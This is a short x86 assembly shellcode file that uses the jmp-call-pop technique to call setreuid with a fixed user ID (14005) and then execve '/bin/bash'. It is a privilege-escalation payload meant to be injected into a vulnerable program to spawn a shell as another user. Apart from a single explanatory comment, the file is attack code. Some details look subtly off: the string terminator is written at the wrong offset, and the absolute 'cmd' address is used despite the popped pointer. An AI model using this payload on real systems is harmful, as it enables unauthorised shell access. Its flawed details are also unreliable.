global _start
_start:
jmp short data

exploit:

xor edx, edx

xor eax, eax ; set reuid
xor ebx, ebx
xor ecx, ecx
mov al, 203
mov bx, 14005 
mov cx, 14005
int 0x80

xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
mov [edx + 10], eax
mov al, 11
mov ebx, cmd
int 0x80

data:
call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
cmd: db '/bin/bash'